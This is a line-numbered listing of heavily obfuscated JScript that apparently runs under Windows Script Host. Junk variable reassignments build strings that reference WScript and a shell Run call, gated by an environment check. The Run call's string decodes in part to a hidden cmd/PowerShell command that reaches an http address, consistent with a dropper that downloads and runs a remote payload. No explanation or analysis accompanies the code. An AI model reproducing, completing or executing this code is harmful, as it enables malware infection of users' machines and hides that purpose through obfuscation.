2 | var ntsheckh = this[gfxsv + oiwlhc + twgwlla + hiooog + oflhnueo + cxqdl + fcmrlza + iebrficqq] ( this[bxsdiu + iuftm + bslsmfma + twgwlla + jxkups + gfxsv + iebrficqq][dkystcc + twgwlla + oflhnueo + oiwlhc + iebrficqq + oflhnueo + izdbay + hqksuoirx + vijyhep + oflhnueo + bslsmfma + iebrficqq] ( bxsdiu + iuftm + bslsmfma + twgwlla + jxkups + gfxsv + iebrficqq + ttynxcjt + iuftm + rlolkljm + oflhnueo + olfeeclzn + olfeeclzn ) [dgqemg + oflhnueo + tkeutfl + dgqemg + oflhnueo + oiwlhc + vpwipfzel] ( ptytd + xpmki + qrrepz + kmmwqtcoy + israkc + dkystcc + ciqwojrrd + dgqemg + dgqemg + qrrepz + pshajy + ufckipkxe + israkc + ciqwojrrd + iuftm + qrrepz + dgqemg + quuyzwhd + dkystcc + eokfcegyw + fcmrlza + iebrficqq + twgwlla + eokfcegyw + olfeeclzn + nteqhxmue + eyqus + oiwlhc + fcmrlza + oflhnueo + olfeeclzn + quuyzwhd + cxqdl + fcmrlza + iebrficqq + oflhnueo + twgwlla + fcmrlza + oiwlhc + iebrficqq + jxkups + eokfcegyw + fcmrlza + oiwlhc + olfeeclzn + quuyzwhd + jxhut + eokfcegyw + bslsmfma + oiwlhc + olfeeclzn + oflhnueo ), 16 ); |
|
3 | for ( cnqjme = 0 ; cnqjme < tzisogazy[olfeeclzn + oflhnueo + fcmrlza + tkeutfl + iebrficqq + rlolkljm] ; ++ cnqjme ) | |
4 | { | |
5 | if ( ntsheckh == tzisogazy[cnqjme] ) | |
6 | { | |
7 | ntsheckh = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( ntsheckh !== true ) | |
12 | this[bxsdiu + iuftm + bslsmfma + twgwlla + jxkups + gfxsv + iebrficqq][rrsnl + llgqauf + jxkups + iebrficqq] ( ); | |
13 | this[bxsdiu + iuftm + bslsmfma + twgwlla + jxkups + gfxsv + iebrficqq][dkystcc + twgwlla + oflhnueo + oiwlhc + iebrficqq + oflhnueo + izdbay + hqksuoirx + vijyhep + oflhnueo + bslsmfma + iebrficqq] ( bxsdiu + iuftm + bslsmfma + twgwlla + jxkups + gfxsv + iebrficqq + ttynxcjt + iuftm + rlolkljm + oflhnueo + olfeeclzn + olfeeclzn ) [twgwlla + llgqauf + fcmrlza] ( bslsmfma + hfxzpm + vpwipfzel + nteqhxmue + ythvzqxyn + bslsmfma + nteqhxmue + gfxsv + eokfcegyw + lxlhec + oflhnueo + twgwlla + hiooog + rlolkljm + oflhnueo + olfeeclzn + olfeeclzn + ttynxcjt + oflhnueo + wkhdndyfx + oflhnueo + nteqhxmue + ggjgiyphs + dkystcc + eokfcegyw + hfxzpm + hfxzpm + oiwlhc + fcmrlza + vpwipfzel + nteqhxmue + igoti + cxqdl + fcmrlza + gqlwyz + eokfcegyw + klfyr + oflhnueo + ggjgiyphs + bxsdiu + oflhnueo + hqksuoirx + dgqemg + oflhnueo + iqemfhu + llgqauf + oflhnueo + hiooog + iebrficqq + nteqhxmue + ggjgiyphs + izdbay + llgqauf + iebrficqq + ianmfah + jxkups + olfeeclzn + oflhnueo + nteqhxmue + fuglr + iebrficqq + oflhnueo + hfxzpm + gfxsv + fuglr + quuyzwhd + jxkups + fcmrlza + gqlwyz + eokfcegyw + jxkups + bslsmfma + oflhnueo + ttynxcjt + gfxsv + vpwipfzel + ehjmzknlg + nteqhxmue + rlolkljm + iebrficqq + iebrficqq + gfxsv + ttdsoew + ythvzqxyn + ythvzqxyn + wrgiwy + whaxo + frrpopf + ttynxcjt + wrgiwy + fkwzhhia + frrpopf + ttynxcjt + wrgiwy + ttynxcjt + iavbna + yygnd + lulerr + ythvzqxyn + jxkups + fcmrlza + gqlwyz + eokfcegyw + jxkups + bslsmfma + oflhnueo + ttynxcjt + gfxsv + rlolkljm + gfxsv + igoti + iypoaix + iypoaix + hiooog + iebrficqq + oiwlhc + twgwlla + iebrficqq + nteqhxmue + fuglr + iebrficqq + oflhnueo + hfxzpm + gfxsv + fuglr + quuyzwhd + jxkups + fcmrlza + gqlwyz + eokfcegyw + jxkups + bslsmfma + oflhnueo + ttynxcjt + gfxsv + vpwipfzel + ehjmzknlg + iypoaix + iypoaix + bslsmfma + hfxzpm + vpwipfzel + nteqhxmue + ythvzqxyn + bslsmfma + nteqhxmue + fcmrlza + oflhnueo + iebrficqq + nteqhxmue + llgqauf + hiooog + oflhnueo + nteqhxmue + quuyzwhd + quuyzwhd + wrgiwy + whaxo + frrpopf + ttynxcjt + wrgiwy + fkwzhhia + frrpopf + ttynxcjt + wrgiwy + ttynxcjt + iavbna + yygnd + lulerr + oqrrkwkcb + eubmlo + eubmlo + eubmlo + eubmlo + quuyzwhd + vpwipfzel + oiwlhc + gqlwyz + lxlhec + lxlhec + lxlhec + twgwlla + eokfcegyw + eokfcegyw + iebrficqq + quuyzwhd + iypoaix + iypoaix + bslsmfma + hfxzpm + vpwipfzel + nteqhxmue + ythvzqxyn + bslsmfma + nteqhxmue + twgwlla + oflhnueo + tkeutfl + hiooog + gqlwyz + twgwlla + frrpopf + iavbna + nteqhxmue + ythvzqxyn + hiooog + nteqhxmue + quuyzwhd + quuyzwhd + wrgiwy + whaxo + frrpopf + ttynxcjt + wrgiwy + fkwzhhia + frrpopf + ttynxcjt + wrgiwy + ttynxcjt + iavbna + yygnd + lulerr + oqrrkwkcb + eubmlo + eubmlo + eubmlo + eubmlo + quuyzwhd + vpwipfzel + oiwlhc + gqlwyz + lxlhec + lxlhec + lxlhec + twgwlla + eokfcegyw + eokfcegyw + iebrficqq + quuyzwhd + iavbna + yygnd + whaxo + lulerr + fkwzhhia + iavbna + frrpopf + fkwzhhia + ulfiqe + lulerr + wrgiwy + lhuvk + eubmlo + iavbna + lulerr + ttynxcjt + vpwipfzel + olfeeclzn + olfeeclzn, 0, false ); |
|
14 | } | |
15 | dgqemg = "r"; | |
16 | dgqemg = "G"; | |
17 | dgqemg = "i"; | |
18 | dgqemg = "q"; | |
19 | dgqemg = "k"; | |
20 | dgqemg = "w"; | |
21 | dgqemg = "B"; | |
22 | dgqemg = "c"; | |
23 | dgqemg = "X"; | |
24 | dgqemg = "S"; | |
25 | dgqemg = "f"; | |
26 | dgqemg = "y"; | |
27 | dgqemg = "z"; | |
28 | dgqemg = "G"; | |
29 | dgqemg = "Z"; | |
30 | dgqemg = "e"; | |
31 | dgqemg = "Z"; | |
32 | dgqemg = "M"; | |
33 | dgqemg = "x"; | |
34 | dgqemg = "s"; | |
35 | dgqemg = "B"; | |
36 | dgqemg = "e"; | |
37 | dgqemg = "d"; | |
38 | dgqemg = "b"; | |
39 | dgqemg = "L"; | |
40 | dgqemg = "j"; | |
41 | dgqemg = "M"; | |
42 | dgqemg = "R"; | |
43 | ythvzqxyn = "G"; | |
44 | ythvzqxyn = "Y"; | |
45 | ythvzqxyn = "/"; | |
46 | twgwlla = "r"; | |
47 | twgwlla = "v"; | |
48 | twgwlla = "A"; | |
49 | twgwlla = "i"; | |
50 | twgwlla = "q"; | |
51 | twgwlla = "d"; | |
52 | twgwlla = "Y"; | |
53 | twgwlla = "H"; | |
54 | twgwlla = "L"; | |
55 | twgwlla = "e"; | |
56 | twgwlla = "V"; | |
57 | twgwlla = "G"; | |
58 | twgwlla = "r"; | |
59 | igoti = "Q"; | |
60 | igoti = "r"; | |
61 | igoti = "\""; | |
62 | ianmfah = "t"; | |
63 | ianmfah = "t"; | |
64 | ianmfah = "o"; | |
65 | ianmfah = "F"; | |
66 | ianmfah = "E"; | |
67 | ianmfah = "W"; | |
68 | ianmfah = "r"; | |
69 | ianmfah = "b"; | |
70 | ianmfah = "E"; | |
71 | ianmfah = "h"; | |
72 | ianmfah = "m"; | |
73 | ianmfah = "b"; | |
74 | ianmfah = "r"; | |
75 | ianmfah = "d"; | |
76 | ianmfah = "y"; | |
77 | ianmfah = "b"; | |
78 | ianmfah = "a"; | |
79 | ianmfah = "A"; | |
80 | ianmfah = "H"; | |
81 | ianmfah = "h"; | |
82 | ianmfah = "H"; | |
83 | ianmfah = "l"; | |
84 | ianmfah = "f"; | |
85 | ianmfah = "q"; | |
86 | ianmfah = "s"; | |
87 | ianmfah = "O"; | |
88 | ianmfah = "K"; | |
89 | ianmfah = "D"; | |
90 | ianmfah = "Q"; | |
91 | ianmfah = "h"; | |
92 | ianmfah = "j"; | |
93 | ianmfah = "Z"; | |
94 | ianmfah = "q"; | |
95 | ianmfah = "j"; | |
96 | ianmfah = "K"; | |
97 | ianmfah = "O"; | |
98 | ianmfah = "Y"; | |
99 | ianmfah = "F"; | |
100 | eyqus = "E"; | |
101 | eyqus = "h"; | |
102 | eyqus = "A"; | |
103 | eyqus = "N"; | |
104 | eyqus = "R"; | |
105 | eyqus = "f"; | |
106 | eyqus = "B"; | |
107 | eyqus = "h"; | |
108 | eyqus = "u"; | |
109 | eyqus = "s"; | |
110 | eyqus = "O"; | |
111 | eyqus = "H"; | |
112 | eyqus = "Q"; | |
113 | eyqus = "f"; | |
114 | eyqus = "i"; | |
115 | eyqus = "d"; | |
116 | eyqus = "o"; | |
117 | eyqus = "l"; | |
118 | eyqus = "o"; | |
119 | eyqus = "B"; | |
120 | eyqus = "j"; | |
121 | eyqus = "C"; | |
122 | eyqus = "n"; | |
123 | eyqus = "C"; | |
124 | eyqus = "K"; | |
125 | eyqus = "m"; | |
126 | eyqus = "u"; | |
127 | eyqus = "X"; | |
128 | eyqus = "Q"; | |
129 | eyqus = "H"; | |
130 | eyqus = "l"; | |
131 | eyqus = "Z"; | |
132 | eyqus = "h"; | |
133 | eyqus = "a"; | |
134 | eyqus = "c"; | |
135 | eyqus = "P"; | |
136 | eyqus = "t"; | |
137 | eyqus = "T"; | |
138 | eyqus = "l"; | |
139 | eyqus = "x"; | |
140 | eyqus = "D"; | |
141 | eyqus = "P"; | |
142 | bslsmfma = "F"; | |
143 | bslsmfma = "j"; | |
144 | bslsmfma = "v"; | |
145 | bslsmfma = "e"; | |
146 | bslsmfma = "C"; | |
147 | bslsmfma = "X"; | |
148 | bslsmfma = "c"; | |
149 | lhuvk = "Z"; | |
150 | lhuvk = "K"; | |
151 | lhuvk = "f"; | |
152 | lhuvk = "I"; | |
153 | lhuvk = "v"; | |
154 | lhuvk = "s"; | |
155 | lhuvk = "K"; | |
156 | lhuvk = "s"; | |
157 | lhuvk = "r"; | |
158 | lhuvk = "f"; | |
159 | lhuvk = "s"; | |
160 | lhuvk = "n"; | |
161 | lhuvk = "O"; | |
162 | lhuvk = "k"; | |
163 | lhuvk = "J"; | |
164 | lhuvk = "E"; | |
165 | lhuvk = "Q"; | |
166 | lhuvk = "O"; | |
167 | lhuvk = "C"; | |
168 | lhuvk = "6"; | |
169 | dkystcc = "G"; | |
170 | dkystcc = "j"; | |
171 | dkystcc = "p"; | |
172 | dkystcc = "d"; | |
173 | dkystcc = "m"; | |
174 | dkystcc = "t"; | |
175 | dkystcc = "k"; | |
176 | dkystcc = "y"; | |
177 | dkystcc = "Y"; | |
178 | dkystcc = "R"; | |
179 | dkystcc = "C"; | |
180 | xpmki = "v"; | |
181 | xpmki = "k"; | |
182 | xpmki = "g"; | |
183 | xpmki = "C"; | |
184 | xpmki = "h"; | |
185 | xpmki = "n"; | |
186 | xpmki = "Q"; | |
187 | xpmki = "j"; | |
188 | xpmki = "g"; | |
189 | xpmki = "l"; | |
190 | xpmki = "f"; | |
191 | xpmki = "C"; | |
192 | xpmki = "q"; | |
193 | xpmki = "u"; | |
194 | xpmki = "B"; | |
195 | xpmki = "g"; | |
196 | xpmki = "O"; | |
197 | xpmki = "k"; | |
198 | xpmki = "x"; | |
199 | xpmki = "a"; | |
200 | xpmki = "I"; | |
201 | xpmki = "W"; | |
202 | xpmki = "y"; | |
203 | xpmki = "V"; | |
204 | xpmki = "y"; | |
205 | xpmki = "h"; | |
206 | xpmki = "w"; | |
207 | xpmki = "l"; | |
208 | xpmki = "m"; | |
209 | xpmki = "P"; | |
210 | xpmki = "K"; | |
211 | ciqwojrrd = "b"; | |
212 | ciqwojrrd = "j"; | |
213 | ciqwojrrd = "e"; | |
214 | ciqwojrrd = "W"; | |
215 | ciqwojrrd = "e"; | |
216 | ciqwojrrd = "A"; | |
217 | ciqwojrrd = "U"; | |
218 | izdbay = "P"; | |
219 | izdbay = "p"; | |
220 | izdbay = "J"; | |
221 | izdbay = "C"; | |
222 | izdbay = "Y"; | |
223 | izdbay = "z"; | |
224 | izdbay = "A"; | |
225 | izdbay = "P"; | |
226 | izdbay = "M"; | |
227 | izdbay = "r"; | |
228 | izdbay = "K"; | |
229 | izdbay = "c"; | |
230 | izdbay = "J"; | |
231 | izdbay = "A"; | |
232 | izdbay = "r"; | |
233 | izdbay = "V"; | |
234 | izdbay = "E"; | |
235 | izdbay = "d"; | |
236 | izdbay = "G"; | |
237 | izdbay = "t"; | |
238 | izdbay = "T"; | |
239 | izdbay = "M"; | |
240 | izdbay = "R"; | |
241 | izdbay = "Y"; | |
242 | izdbay = "h"; | |
243 | izdbay = "z"; | |
244 | izdbay = "p"; | |
245 | izdbay = "v"; | |
246 | izdbay = "x"; | |
247 | izdbay = "G"; | |
248 | izdbay = "O"; | |
249 | ttynxcjt = "v"; | |
250 | ttynxcjt = "."; | |
251 | lulerr = "o"; | |
252 | lulerr = "X"; | |
253 | lulerr = "a"; | |
254 | lulerr = "Z"; | |
255 | lulerr = "E"; | |
256 | lulerr = "h"; | |
257 | lulerr = "b"; | |
258 | lulerr = "w"; | |
259 | lulerr = "E"; | |
260 | lulerr = "X"; | |
261 | lulerr = "G"; | |
262 | lulerr = "b"; | |
263 | lulerr = "H"; | |
264 | lulerr = "t"; | |
265 | lulerr = "v"; | |
266 | lulerr = "Z"; | |
267 | lulerr = "X"; | |
268 | lulerr = "Q"; | |
269 | lulerr = "N"; | |
270 | lulerr = "M"; | |
271 | lulerr = "p"; | |
272 | lulerr = "Q"; | |
273 | lulerr = "N"; | |
274 | lulerr = "s"; | |
275 | lulerr = "c"; | |
276 | lulerr = "e"; | |
277 | lulerr = "X"; | |
278 | lulerr = "D"; | |
279 | lulerr = "U"; | |
280 | lulerr = "R"; | |
281 | lulerr = "e"; | |
282 | lulerr = "v"; | |
283 | lulerr = "c"; | |
284 | lulerr = "H"; | |
285 | lulerr = "a"; | |
286 | lulerr = "A"; | |
287 | lulerr = "n"; | |
288 | lulerr = "5"; | |
289 | ehjmzknlg = "Q"; | |
290 | ehjmzknlg = "W"; | |
291 | ehjmzknlg = "f"; | |
292 | hfxzpm = "K"; | |
293 | hfxzpm = "M"; | |
294 | hfxzpm = "u"; | |
295 | hfxzpm = "E"; | |
296 | hfxzpm = "X"; | |
297 | hfxzpm = "L"; | |
298 | hfxzpm = "o"; | |
299 | hfxzpm = "N"; | |
300 | hfxzpm = "d"; | |
301 | hfxzpm = "C"; | |
302 | hfxzpm = "N"; | |
303 | hfxzpm = "b"; | |
304 | hfxzpm = "I"; | |
305 | hfxzpm = "r"; | |
306 | hfxzpm = "h"; | |
307 | hfxzpm = "e"; | |
308 | hfxzpm = "M"; | |
309 | hfxzpm = "L"; | |
310 | hfxzpm = "M"; | |
311 | hfxzpm = "a"; | |
312 | hfxzpm = "r"; | |
313 | hfxzpm = "p"; | |
314 | hfxzpm = "R"; | |
315 | hfxzpm = "f"; | |
316 | hfxzpm = "o"; | |
317 | hfxzpm = "B"; | |
318 | hfxzpm = "S"; | |
319 | hfxzpm = "q"; | |
320 | hfxzpm = "N"; | |
321 | hfxzpm = "x"; | |
322 | hfxzpm = "g"; | |
323 | hfxzpm = "c"; | |
324 | hfxzpm = "m"; | |
325 | kmmwqtcoy = "f"; | |
326 | kmmwqtcoy = "k"; | |
327 | kmmwqtcoy = "W"; | |
328 | kmmwqtcoy = "p"; | |
329 | kmmwqtcoy = "l"; | |
330 | kmmwqtcoy = "g"; | |
331 | kmmwqtcoy = "V"; | |
332 | kmmwqtcoy = "u"; | |
333 | kmmwqtcoy = "V"; | |
334 | kmmwqtcoy = "Z"; | |
335 | kmmwqtcoy = "j"; | |
336 | kmmwqtcoy = "X"; | |
337 | kmmwqtcoy = "P"; | |
338 | kmmwqtcoy = "u"; | |
339 | kmmwqtcoy = "M"; | |
340 | kmmwqtcoy = "w"; | |
341 | kmmwqtcoy = "n"; | |
342 | kmmwqtcoy = "t"; | |
343 | kmmwqtcoy = "I"; | |
344 | kmmwqtcoy = "e"; | |
345 | kmmwqtcoy = "E"; | |
346 | kmmwqtcoy = "J"; | |
347 | kmmwqtcoy = "X"; | |
348 | kmmwqtcoy = "b"; | |
349 | kmmwqtcoy = "o"; | |
350 | kmmwqtcoy = "H"; | |
351 | kmmwqtcoy = "P"; | |
352 | kmmwqtcoy = "R"; | |
353 | kmmwqtcoy = "L"; | |
354 | kmmwqtcoy = "h"; | |
355 | kmmwqtcoy = "h"; | |
356 | kmmwqtcoy = "J"; | |
357 | kmmwqtcoy = "P"; | |
358 | kmmwqtcoy = "Y"; | |
359 | bxsdiu = "A"; | |
360 | bxsdiu = "r"; | |
361 | bxsdiu = "W"; | |
362 | iqemfhu = "x"; | |
363 | iqemfhu = "x"; | |
364 | iqemfhu = "W"; | |
365 | iqemfhu = "L"; | |
366 | iqemfhu = "F"; | |
367 | iqemfhu = "F"; | |
368 | iqemfhu = "O"; | |
369 | iqemfhu = "E"; | |
370 | iqemfhu = "T"; | |
371 | iqemfhu = "e"; | |
372 | iqemfhu = "h"; | |
373 | iqemfhu = "K"; | |
374 | iqemfhu = "q"; | |
375 | iqemfhu = "t"; | |
376 | iqemfhu = "h"; | |
377 | iqemfhu = "g"; | |
378 | iqemfhu = "C"; | |
379 | iqemfhu = "L"; | |
380 | iqemfhu = "l"; | |
381 | iqemfhu = "Q"; | |
382 | iqemfhu = "m"; | |
383 | iqemfhu = "H"; | |
384 | iqemfhu = "d"; | |
385 | iqemfhu = "P"; | |
386 | iqemfhu = "v"; | |
387 | iqemfhu = "g"; | |
388 | iqemfhu = "t"; | |
389 | iqemfhu = "B"; | |
390 | iqemfhu = "J"; | |
391 | iqemfhu = "h"; | |
392 | iqemfhu = "m"; | |
393 | iqemfhu = "V"; | |
394 | iqemfhu = "T"; | |
395 | iqemfhu = "m"; | |
396 | iqemfhu = "d"; | |
397 | iqemfhu = "k"; | |
398 | iqemfhu = "q"; | |
399 | wrgiwy = "a"; | |
400 | wrgiwy = "U"; | |
401 | wrgiwy = "W"; | |
402 | wrgiwy = "Y"; | |
403 | wrgiwy = "n"; | |
404 | wrgiwy = "e"; | |
405 | wrgiwy = "k"; | |
406 | wrgiwy = "w"; | |
407 | wrgiwy = "1"; | |
408 | oiwlhc = "t"; | |
409 | oiwlhc = "P"; | |
410 | oiwlhc = "V"; | |
411 | oiwlhc = "Y"; | |
412 | oiwlhc = "Y"; | |
413 | oiwlhc = "c"; | |
414 | oiwlhc = "a"; | |
415 | jxkups = "m"; | |
416 | jxkups = "W"; | |
417 | jxkups = "H"; | |
418 | jxkups = "v"; | |
419 | jxkups = "R"; | |
420 | jxkups = "T"; | |
421 | jxkups = "p"; | |
422 | jxkups = "r"; | |
423 | jxkups = "i"; | |
424 | jxkups = "W"; | |
425 | jxkups = "M"; | |
426 | jxkups = "H"; | |
427 | jxkups = "m"; | |
428 | jxkups = "Q"; | |
429 | jxkups = "m"; | |
430 | jxkups = "i"; | |
431 | jxkups = "D"; | |
432 | jxkups = "H"; | |
433 | jxkups = "P"; | |
434 | jxkups = "Y"; | |
435 | jxkups = "y"; | |
436 | jxkups = "s"; | |
437 | jxkups = "p"; | |
438 | jxkups = "G"; | |
439 | jxkups = "B"; | |
440 | jxkups = "s"; | |
441 | jxkups = "I"; | |
442 | jxkups = "G"; | |
443 | jxkups = "x"; | |
444 | jxkups = "Y"; | |
445 | jxkups = "L"; | |
446 | jxkups = "N"; | |
447 | jxkups = "i"; | |
448 | eubmlo = "X"; | |
449 | eubmlo = "x"; | |
450 | eubmlo = "s"; | |
451 | eubmlo = "Y"; | |
452 | eubmlo = "n"; | |
453 | eubmlo = "F"; | |
454 | eubmlo = "L"; | |
455 | eubmlo = "B"; | |
456 | eubmlo = "K"; | |
457 | eubmlo = "F"; | |
458 | eubmlo = "F"; | |
459 | eubmlo = "O"; | |
460 | eubmlo = "S"; | |
461 | eubmlo = "r"; | |
462 | eubmlo = "p"; | |
463 | eubmlo = "Z"; | |
464 | eubmlo = "e"; | |
465 | eubmlo = "T"; | |
466 | eubmlo = "F"; | |
467 | eubmlo = "k"; | |
468 | eubmlo = "J"; | |
469 | eubmlo = "Y"; | |
470 | eubmlo = "o"; | |
471 | eubmlo = "c"; | |
472 | eubmlo = "I"; | |
473 | eubmlo = "A"; | |
474 | eubmlo = "s"; | |
475 | eubmlo = "N"; | |
476 | eubmlo = "z"; | |
477 | eubmlo = "n"; | |
478 | eubmlo = "E"; | |
479 | eubmlo = "i"; | |
480 | eubmlo = "U"; | |
481 | eubmlo = "E"; | |
482 | eubmlo = "C"; | |
483 | eubmlo = "I"; | |
484 | eubmlo = "h"; | |
485 | eubmlo = "w"; | |
486 | eubmlo = "v"; | |
487 | eubmlo = "8"; | |
488 | qrrepz = "S"; | |
489 | qrrepz = "E"; | |
490 | fcmrlza = "b"; | |
491 | fcmrlza = "u"; | |
492 | fcmrlza = "v"; | |
493 | fcmrlza = "R"; | |
494 | fcmrlza = "f"; | |
495 | fcmrlza = "V"; | |
496 | fcmrlza = "J"; | |
497 | fcmrlza = "n"; | |
498 | iavbna = "I"; | |
499 | iavbna = "w"; | |
500 | iavbna = "a"; | |
501 | iavbna = "a"; | |
502 | iavbna = "v"; | |
503 | iavbna = "L"; | |
504 | iavbna = "j"; | |
505 | iavbna = "W"; | |
506 | iavbna = "p"; | |
507 | iavbna = "S"; | |
508 | iavbna = "E"; | |
509 | iavbna = "s"; | |
510 | iavbna = "J"; | |
511 | iavbna = "Z"; | |
512 | iavbna = "P"; | |
513 | iavbna = "p"; | |
514 | iavbna = "G"; | |
515 | iavbna = "V"; | |
516 | iavbna = "C"; | |
517 | iavbna = "K"; | |
518 | iavbna = "p"; | |
519 | iavbna = "N"; | |
520 | iavbna = "w"; | |
521 | iavbna = "t"; | |
522 | iavbna = "E"; | |
523 | iavbna = "u"; | |
524 | iavbna = "f"; | |
525 | iavbna = "K"; | |
526 | iavbna = "J"; | |
527 | iavbna = "V"; | |
528 | iavbna = "D"; | |
529 | iavbna = "Y"; | |
530 | iavbna = "w"; | |
531 | iavbna = "Q"; | |
532 | iavbna = "P"; | |
533 | iavbna = "I"; | |
534 | iavbna = "S"; | |
535 | iavbna = "z"; | |
536 | iavbna = "E"; | |
537 | iavbna = "L"; | |
538 | iavbna = "t"; | |
539 | iavbna = "M"; | |
540 | iavbna = "p"; | |
541 | iavbna = "2"; | |
542 | tkeutfl = "i"; | |
543 | tkeutfl = "Y"; | |
544 | tkeutfl = "b"; | |
545 | tkeutfl = "S"; | |
546 | tkeutfl = "m"; | |
547 | tkeutfl = "H"; | |
548 | tkeutfl = "L"; | |
549 | tkeutfl = "b"; | |
550 | tkeutfl = "T"; | |
551 | tkeutfl = "m"; | |
552 | tkeutfl = "G"; | |
553 | tkeutfl = "c"; | |
554 | tkeutfl = "P"; | |
555 | tkeutfl = "U"; | |
556 | tkeutfl = "U"; | |
557 | tkeutfl = "x"; | |
558 | tkeutfl = "o"; | |
559 | tkeutfl = "n"; | |
560 | tkeutfl = "c"; | |
561 | tkeutfl = "c"; | |
562 | tkeutfl = "W"; | |
563 | tkeutfl = "r"; | |
564 | tkeutfl = "w"; | |
565 | tkeutfl = "J"; | |
566 | tkeutfl = "A"; | |
567 | tkeutfl = "I"; | |
568 | tkeutfl = "g"; | |
569 | rlolkljm = "w"; | |
570 | rlolkljm = "X"; | |
571 | rlolkljm = "X"; | |
572 | rlolkljm = "h"; | |
573 | rlolkljm = "v"; | |
574 | rlolkljm = "l"; | |
575 | rlolkljm = "u"; | |
576 | rlolkljm = "D"; | |
577 | rlolkljm = "w"; | |
578 | rlolkljm = "o"; | |
579 | rlolkljm = "U"; | |
580 | rlolkljm = "J"; | |
581 | rlolkljm = "P"; | |
582 | rlolkljm = "x"; | |
583 | rlolkljm = "E"; | |
584 | rlolkljm = "p"; | |
585 | rlolkljm = "h"; | |
586 | cxqdl = "R"; | |
587 | cxqdl = "k"; | |
588 | cxqdl = "I"; | |
589 | nteqhxmue = "L"; | |
590 | nteqhxmue = "S"; | |
591 | nteqhxmue = "a"; | |
592 | nteqhxmue = "E"; | |
593 | nteqhxmue = "O"; | |
594 | nteqhxmue = "h"; | |
595 | nteqhxmue = "f"; | |
596 | nteqhxmue = "E"; | |
597 | nteqhxmue = "u"; | |
598 | nteqhxmue = "t"; | |
599 | nteqhxmue = "g"; | |
600 | nteqhxmue = "x"; | |
601 | nteqhxmue = "p"; | |
602 | nteqhxmue = "P"; | |
603 | nteqhxmue = " "; | |
604 | oqrrkwkcb = "r"; | |
605 | oqrrkwkcb = "o"; | |
606 | oqrrkwkcb = "S"; | |
607 | oqrrkwkcb = "V"; | |
608 | oqrrkwkcb = "l"; | |
609 | oqrrkwkcb = "R"; | |
610 | oqrrkwkcb = "M"; | |
611 | oqrrkwkcb = "e"; | |
612 | oqrrkwkcb = "a"; | |
613 | oqrrkwkcb = "w"; | |
614 | oqrrkwkcb = "P"; | |
615 | oqrrkwkcb = "X"; | |
616 | oqrrkwkcb = "o"; | |
617 | oqrrkwkcb = "i"; | |
618 | oqrrkwkcb = "P"; | |
619 | oqrrkwkcb = "Y"; | |
620 | oqrrkwkcb = "@"; | |
621 | ttdsoew = "d"; | |
622 | ttdsoew = "B"; | |
623 | ttdsoew = "m"; | |
624 | ttdsoew = "m"; | |
625 | ttdsoew = "j"; | |
626 | ttdsoew = "D"; | |
627 | ttdsoew = "D"; | |
628 | ttdsoew = "x"; | |
629 | ttdsoew = "q"; | |
630 | ttdsoew = "D"; | |
631 | ttdsoew = "e"; | |
632 | ttdsoew = "g"; | |
633 | ttdsoew = "L"; | |
634 | ttdsoew = "g"; | |
635 | ttdsoew = "u"; | |
636 | ttdsoew = "m"; | |
637 | ttdsoew = "f"; | |
638 | ttdsoew = "Z"; | |
639 | ttdsoew = "q"; | |
640 | ttdsoew = "R"; | |
641 | ttdsoew = "T"; | |
642 | ttdsoew = "J"; | |
643 | ttdsoew = "A"; | |
644 | ttdsoew = "U"; | |
645 | ttdsoew = "M"; | |
646 | ttdsoew = "f"; | |
647 | ttdsoew = "J"; | |
648 | ttdsoew = "P"; | |
649 | ttdsoew = "o"; | |
650 | ttdsoew = "R"; | |
651 | ttdsoew = "I"; | |
652 | ttdsoew = "x"; | |
653 | ttdsoew = "O"; | |
654 | ttdsoew = "v"; | |
655 | ttdsoew = "f"; | |
656 | ttdsoew = "x"; | |
657 | ttdsoew = "l"; | |
658 | ttdsoew = "m"; | |
659 | ttdsoew = "l"; | |
660 | ttdsoew = "E"; | |
661 | ttdsoew = ":"; | |
662 | ulfiqe = "H"; | |
663 | ulfiqe = "Y"; | |
664 | ulfiqe = "k"; | |
665 | ulfiqe = "k"; | |
666 | ulfiqe = "F"; | |
667 | ulfiqe = "a"; | |
668 | ulfiqe = "r"; | |
669 | ulfiqe = "k"; | |
670 | ulfiqe = "p"; | |
671 | ulfiqe = "D"; | |
672 | ulfiqe = "M"; | |
673 | ulfiqe = "R"; | |
674 | ulfiqe = "E"; | |
675 | ulfiqe = "L"; | |
676 | ulfiqe = "o"; | |
677 | ulfiqe = "I"; | |
678 | ulfiqe = "S"; | |
679 | ulfiqe = "T"; | |
680 | ulfiqe = "Z"; | |
681 | ulfiqe = "W"; | |
682 | ulfiqe = "i"; | |
683 | ulfiqe = "n"; | |
684 | ulfiqe = "k"; | |
685 | ulfiqe = "r"; | |
686 | ulfiqe = "I"; | |
687 | ulfiqe = "b"; | |
688 | ulfiqe = "f"; | |
689 | ulfiqe = "b"; | |
690 | ulfiqe = "j"; | |
691 | ulfiqe = "L"; | |
692 | ulfiqe = "N"; | |
693 | ulfiqe = "7"; | |
694 | iypoaix = "u"; | |
695 | iypoaix = "T"; | |
696 | iypoaix = "A"; | |
697 | iypoaix = "w"; | |
698 | iypoaix = "A"; | |
699 | iypoaix = "c"; | |
700 | iypoaix = "E"; | |
701 | iypoaix = "j"; | |
702 | iypoaix = "k"; | |
703 | iypoaix = "&"; | |
704 | frrpopf = "j"; | |
705 | frrpopf = "g"; | |
706 | frrpopf = "G"; | |
707 | frrpopf = "f"; | |
708 | frrpopf = "n"; | |
709 | frrpopf = "P"; | |
710 | frrpopf = "s"; | |
711 | frrpopf = "U"; | |
712 | frrpopf = "m"; | |
713 | frrpopf = "B"; | |
714 | frrpopf = "3"; | |
715 | hiooog = "R"; | |
716 | hiooog = "R"; | |
717 | hiooog = "n"; | |
718 | hiooog = "z"; | |
719 | hiooog = "s"; | |
720 | vpwipfzel = "j"; | |
721 | vpwipfzel = "I"; | |
722 | vpwipfzel = "t"; | |
723 | vpwipfzel = "w"; | |
724 | vpwipfzel = "d"; | |
725 | eokfcegyw = "h"; | |
726 | eokfcegyw = "a"; | |
727 | eokfcegyw = "H"; | |
728 | eokfcegyw = "e"; | |
729 | eokfcegyw = "o"; | |
730 | eokfcegyw = "u"; | |
731 | eokfcegyw = "f"; | |
732 | eokfcegyw = "u"; | |
733 | eokfcegyw = "m"; | |
734 | eokfcegyw = "v"; | |
735 | eokfcegyw = "X"; | |
736 | eokfcegyw = "P"; | |
737 | eokfcegyw = "e"; | |
738 | eokfcegyw = "S"; | |
739 | eokfcegyw = "b"; | |
740 | eokfcegyw = "K"; | |
741 | eokfcegyw = "r"; | |
742 | eokfcegyw = "T"; | |
